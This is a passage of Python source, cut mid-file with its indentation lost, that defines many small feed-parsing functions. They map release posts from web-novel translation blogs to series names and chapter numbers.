return buildReleaseMessage(item, 'A Mismatched Marriage: Records of Washed Away Injustices', vol, chp, frag=frag, postfix=postfix)
return False
def extractSenjiQcreations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Sandstorm' in item['tags'] and 'Release' in item['tags']:
return buildReleaseMessage(item, 'Sandstorm Story', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
def extractPsicernTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSymbiote(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractUnlimitedStoryWorks(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTalesOfPaulTwister(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'The Fate of Paul Twister' in item['tags']:
assert not vol
vol = 2
return buildReleaseMessage(item, 'The Tales of Paul Twister', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'The Return of Paul Twister' in item['tags']:
assert not vol
vol = 3
return buildReleaseMessage(item, 'The Tales of Paul Twister', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractRejectHero(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractReiTransBlog(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRealmOfChaos(item):
'''
#'Realm of Chaos'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Myriad of Shades' in item['tags']:
names = [tmp for tmp in item['tags'] if tmp in ['Celest Ambrosia', 'Kiriko', 'Melanie Ambrosia', 'Shana Bonnet', 'Silvia', 'XCrossJ', 'Ghost']]
postfix_out = ", ".join(names)
if postfix:
postfix_out += " - " + postfix
return buildReleaseMessage(item, 'Myriad of Shades', vol, chp, frag=frag, postfix=postfix_out, tl_type='oel')
return False
def extractTieshaunn(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSTLTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTowardsTheSky(item):
'''
# 'Towards the Sky~'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSinsOfTheFathers(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
return buildReleaseMessage(item, 'Sins of the Fathers '.lower(), vol, chp, frag=frag, postfix=postfix, tl_type='oel')
####################################################################################################################################################
#
####################################################################################################################################################
def extractTofubyu(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSkullSquadron(item):
'''
# 'Skull Squadron'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSuperPotatoTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractU3000(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractStarrydawnTranslations(item):
'''
# 'Starrydawn Translations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSnowTranslations(item):
'''
# 'Snow Translations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTalesofTheForgottenslayer(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'the botched summoning' in item['tags']:
return buildReleaseMessage(item, 'The Botched Summoning', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
def extractShermaTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPumpkinTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPremiumRedTea(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTseirpTranslations(item):
'''
# 'Tseirp Translations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'IS SS' in item['title'] and not postfix:
postfix = "Side Story"
if item['title'].startswith("IS "):
return buildReleaseMessage(item, 'Invincible Saint ~Salaryman, the Path I Walk to Survive in This Other World~', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith("GC "):
return buildReleaseMessage(item, 'I\'ve Became Able to Do Anything With My Growth Cheat, but I Can\'t Seem to Get Out of Being Jobless', vol, chp, frag=frag, postfix=postfix)
if 'Live Dungeon' in item['tags']:
return buildReleaseMessage(item, 'Live Dungeon', vol, chp, frag=frag, postfix=postfix)
return False
def extractStoneBurners(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPandafuqTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
# Fragments are written "Name {chapter} ({frag})". Arrrgh.
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractPippiSite(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'FMTL – Chapter' in item['title']:
return buildReleaseMessage(item, 'First Marriage Then Love', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSweetACollections(item):
'''
# 'Sweet A Collections'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRoastedTea(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSpringScents(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractOpinisaya(item):
'''
# 'Opinisaya.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTaidadonoTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSaurisTLBlog(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSilverButterfly(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTheSphere(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSnowDust(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRiptranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTheBeginningAfterTheEnd(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if ":" in item['title'] and not postfix:
postfix = item['title'].split(":")[-1]
return buildReleaseMessage(item, 'The Beginning After The End', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
####################################################################################################################################################
#
####################################################################################################################################################
def extractSoltarinationScanlations (item):
'''
# 'Soltarination Scanlations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRosyFantasy(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Yu Ren' in item['tags']:
return buildReleaseMessage(item, 'Yu Ren', vol, chp, frag=frag, postfix=postfix)
if 'Chu Wang Fei' in item['tags']:
return buildReleaseMessage(item, 'Chu Wang Fei', vol, chp, frag=frag, postfix=postfix)
if 'Seven Unfortunate Lifetimes' in item['tags']:
return buildReleaseMessage(item, 'Seven Unfortunate Lifetimes', vol, chp, frag=frag, postfix=postfix)
if 'All Thanks to a Single Moment of Impulse' in item['tags']:
return buildReleaseMessage(item, 'All Thanks to a Single Moment of Impulse', vol, chp, frag=frag, postfix=postfix)
if 'White Calculation' in item['tags']:
return buildReleaseMessage(item, 'White Calculation', vol, chp, frag=frag, postfix=postfix)
if "demon wang's gold medal status favorite fei" in item['tags'] or \
item['title'].startswith('DWGMSFF') or \
"demon's wang golden favorite fei" in item['tags']:
return buildReleaseMessage(item, "Demon Wang's Golden Favorite Fei", vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTrungNguyen(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Bringing the Farm to Live in Another World' in item['title'] or \
'Bringing the Farm...' in item['title']:
return buildReleaseMessage(item, 'Bringing the Farm to Live in Another World', vol, chp, frag=frag, postfix=postfix)
if 'The First Alchemist - Chap' in item['title']:
return buildReleaseMessage(item, 'The First Alchemist', vol, chp, frag=frag, postfix=postfix)
return False
def extractRedDragonTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Kaettekite mo fantasy' in item['tags']:
return buildReleaseMessage(item, 'Kaettekite mo Fantasy!?', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractThisWorldWork(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSandwichKingdom(item):
'''
#'Sandwich Kingdom'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'sougen no okite' in item['tags']:
return buildReleaseMessage(item, 'Sougen no Okite ~Shii yatsu ga moteru, ii buzoku ni umarekawatta zo~', vol, chp, frag=frag, postfix=postfix)
if 'Q.Maou-sama A.Mamono' in item['tags']:
return buildReleaseMessage(item, 'Q. Maou-sama no oshigoto wa? A. Mamono musume e no tanetsuke desu', vol, chp, frag=frag, postfix=postfix)
if 'kininaru kanojo wo tokoton okashi tsukusu hanshi' in item['tags']:
return buildReleaseMessage(item, 'Kininaru Kanojo wo Totokon Okashi Tsukusu Hanashi', vol, chp, frag=frag, postfix=postfix)
if 'game sekai tenseishitara' in item['tags']:
return buildReleaseMessage(item, 'After Reincarnating Into This Game World I Seemed to Have Taken Over the Control of Status', vol, chp, frag=frag, postfix=postfix)
if 'healing semen' in item['tags']:
return buildReleaseMessage(item, 'Curing incurable disease with semen', vol, chp, frag=frag, postfix=postfix)
if 'Kininaru' in item['tags']:
return buildReleaseMessage(item, 'Ki ni Naru Kanojo wo Tokoton Okashitsukusu Hanashi', vol, chp, frag=frag, postfix=postfix)
return False
def extractRinOtakuBlog(item):
'''
# 'RinOtakuBlog'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Netooku Otoko' in item['tags']:
return buildReleaseMessage(item, 'Netooku Otoko no Tanoshii Isekai Boueki', vol, chp, frag=frag, postfix=postfix)
if 'Sonohi Sekai ga Kawatta' in item['tags']:
return buildReleaseMessage(item, 'Sonohi Sekai ga Kawatta', vol, chp, frag=frag, postfix=postfix)
return False
def extractTheNamed(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTarableTranslations(item):
'''
# 'Tarable Translations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractReadMeTranslations(item):
'''
# 'Read Me Translations'
'''
ttmp = item['title'].replace("My CEO Wife Chap.", "My CEO Wife Chapter")
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(ttmp)
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if item['title'].startswith("My CEO Wife Chap. "):
return buildReleaseMessage(item, 'Wo De Meinu Zongcai Laopo', vol, chp, frag=frag, postfix=postfix)
return False
def extractTheAsianCult(item):
'''
# 'The Asian Cult'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPolyphonicStoryTranslationGroup(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPridesFamiliarsMaidens(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTheMustangTranslator(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'The Six Immortals' in item['tags']:
return buildReleaseMessage(item, 'The Six Immortals', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractPopsiclete(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTurtleandHareTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Time (对的时间对的人)' in item['title'] or 'Time (对的时间对的人)' in item['tags']:
return buildReleaseMessage(item, 'Time', vol, chp, frag=frag, postfix=postfix)
return False
def extractSaberTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRomanticDreamersSanctuary(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTLSyosetsu(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if item['title'].lower().strip().startswith('defiled hero chapter'):
return buildReleaseMessage(item, 'Defiled Hero', vol, chp, frag=frag, postfix=postfix)
return False
def extractQualideaofScumandaGoldCoin(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSoltarination(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPlainlyBored(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Empress with no Virtue'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'Empress with no Virtue', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTheDefendTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSlimeLv1(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractUniversesWithMeaning(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Angel of Death' in item['title']:
return buildReleaseMessage(item, 'Angel of Death', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'In The Name Of God' in item['title']:
return buildReleaseMessage(item, 'In The Name Of God', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOtomeRevolution(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSleepyTranslations(item):
'''
# 'Sleepy Translations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTheIronTeeth(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractUndecentTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTenThousandHeavenControllingSword(item):
'''
# 'Ten Thousand Heaven Controlling Sword'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTaptrans(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRidwanTrans(item):
'''
# 'RidwanTrans'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Isekai Meikyuu no Saishinbu wo Mezasou' in item['title']:
extract = re.search(r'Chapter (\d+)\-(\d+)', item['title'], re.IGNORECASE)
if extract and not frag:
chp = int(extract.group(1))
frag = int(extract.group(2))
return buildReleaseMessage(item, 'Isekai Meikyuu no Saishinbu wo Mezasou', vol, chp, frag=frag, postfix=postfix)
return False
def extractOyasumiReads(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'ISEKAIJIN NO TEBIKISHO' in item['tags']:
return buildReleaseMessage(item, 'Isekaijin no Tebikisho', vol, chp, frag=frag, postfix=postfix)
return False
def extractUDonateWeTranslate(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'ATG' in item['tags'] or ('Against the Gods' in item['title'] and 'Chapter' in item['title']):
return buildReleaseMessage(item, 'Against the Gods', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractPiggyBottleTranslations(item):
'''
#'PiggyBottle Translations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if item['title'].lower().startswith('beseech the devil'):
return buildReleaseMessage(item, 'Beseech the Devil', vol, chp, frag=frag, postfix=postfix)
return False
def extractRumanshisLair(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if item['title'].startswith('Jobless'):
return buildReleaseMessage(item, 'I Aim to Be an Adventurer with the Jobclass of "Jobless"', vol, chp, frag=frag, postfix=postfix)
if 'The Harem Was a Forced Goal' in item['tags'] or 'THWAFG' in item['title']:
if "SS" in item['title'] and not postfix:
postfix = "Side Story"
return buildReleaseMessage(item, 'The Harem Was a Forced Goal', vol, chp, frag=frag, postfix=postfix)
if 'Isekai Cheat' in item['tags'] or 'Isekai Cheat' in item['title']:
return buildReleaseMessage(item, 'Different World Reincarnation ~ Enjoying the new world as a cheat ~', vol, chp, frag=frag, postfix=postfix)
if 'Other Worlds Monster Breeder' in item['tags'] or 'Other World’s Monster Breeder (PokeGod)'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'Other World\'s Monster Breeder', vol, chp, frag=frag, postfix=postfix)
if 'When I returned home, what I found was fantasy!?'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'Kaettekite mo Fantasy!?', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSpiritualTranscription(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'TEO' in item['tags'] or 'The Empyrean Overlord' in item['tags']:
return buildReleaseMessage(item, 'The Empyrean Overlord', vol, chp, frag=frag, postfix=postfix)
return False
def extractPaztok(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title']:
return False
if not postfix and ":" in item['title']:
postfix = item['title'].split(":")[-1]
if 'Paztok' in item['tags']:
return buildReleaseMessage(item, 'Paztok', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTranslationTreasureBox(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRedLanternArchives(item):
'''
# 'Red Lantern Archives'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Outaishihi ni Nante Naritakunai!!' in item['tags']:
return buildReleaseMessage(item, 'Outaishihi ni Nante Naritakunai!!', vol, chp, frag=frag, postfix=postfix)
return False
def extractTranslatingForYourPleasure(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if "The Inverted Dragon's Scale" in item['tags']:
return buildReleaseMessage(item, "The Inverted Dragon's Scale", vol, chp, frag=frag, postfix=postfix)
return False
def extractSETSUNA86BLOG(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTryTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTrinityArchive(item):
'''
# 'Trinity Archive'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Summoned Slaughterer' in item['tags']:
return buildReleaseMessage(item, 'Summoned Slaughterer', vol, chp, frag=frag, postfix=postfix)
return False
def extractPielordTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTwelveMonthsofMay(item):
'''
# 'Twelve Months of May'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'My Mister Ostrich' in item['tags']:
return buildReleaseMessage(item, 'Wo De Tuo Niao Xian Sheng', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith("Ostrich Chapter"):
return buildReleaseMessage(item, 'Wo De Tuo Niao Xian Sheng', vol, chp, frag=frag, postfix=postfix)
return False
def extractUkel2x(item):
'''
#'Ukel2x
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if item['title'].lower().startswith('volume'):
return buildReleaseMessage(item, 'Kokugensou wo Item Cheat de Ikinuku', vol, chp, frag=frag, postfix=postfix)
if item['title'].lower().startswith('dungeon kurashi no moto yuusha chapter'):
return buildReleaseMessage(item, 'Dungeon Kurashi No Moto Yuusha', vol, chp, frag=frag, postfix=postfix)
if item['title'].lower().startswith('munivit anima chapter'):
return buildReleaseMessage(item, 'Munivit Anima', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
def extractRootOfEvil(item):
'''
# 'Root of Evil'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractStellarTransformationCon(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractUnnamedtranslations(item):
'''
# 'unnamedtranslations.blogspot.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTusTrans(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTumbleIntoFantasy(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractQualiTeaTranslations(item):
'''
# 'QualiTeaTranslations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Harry Potter and the Rise of the Ordinary Person' in item['tags']:
return None
if 'Romance of Dragons and Snakes' in item['tags']:
return buildReleaseMessage(item, 'Romance of Dragons and Snakes', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSolstar24(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'jin xiu wei yang' in item['tags']:
return buildReleaseMessage(item, 'Jin Xiu Wei Yang', vol, chp, frag=frag, postfix=postfix)
if 'dao qing' in item['tags']:
return buildReleaseMessage(item, 'Dao Qing', vol, chp, frag=frag, postfix=postfix)
return False
def extractSloth(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractUnlimitedNovelFailures(item):
'''
# 'Unlimited Novel Failures'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRinkageTranslation(item):
'''
'Rinkage Translation'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Netooku Otoko no Tanoshii Isekai Boueki' in item['tags']:
return buildReleaseMessage(item, 'Netooku Otoko no Tanoshii Isekai Boueki', vol, chp, frag=frag, postfix=postfix)
if 'Atelier Tanaka' in item['tags']:
return buildReleaseMessage(item, 'Atelier Tanaka', vol, chp, frag=frag, postfix=postfix)
if 'Din No Monshou' in item['tags']:
return buildReleaseMessage(item, 'Din No Monshou', vol, chp, frag=frag, postfix=postfix)
if 'Netooku Otoko' in item['tags']:
return buildReleaseMessage(item, 'Netooku Otoko no Tanoshii Isekai Boueki', vol, chp, frag=frag, postfix=postfix)
if 'Yuusha Party' in item['tags']:
return buildReleaseMessage(item, 'Yuusha Party ni Kawaii Ko ga Ita node, Kokuhaku Shitemita.', vol, chp, frag=frag, postfix=postfix)
return False
def extractSelkinNovel(item):
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractStartlingSurprisesAtEveryStep(item):
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'bu bu jing xin' in item['tags']:
return buildReleaseMessage(item, 'Bu Bu Jing Xin', vol, chp, frag=frag, postfix=postfix)
return False
def extractPathOfTranslation(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if "Emperor's Domination" in item['tags']:
return buildReleaseMessage(item, "Emperor's Domination", vol, chp, frag=frag, postfix=postfix)
if 'Big Life' in item['tags']:
return buildReleaseMessage(item, 'Big Life', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith('Game Market 1983'):
return buildReleaseMessage(item, 'Game Market 1983', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith('Spirit Vessel'):
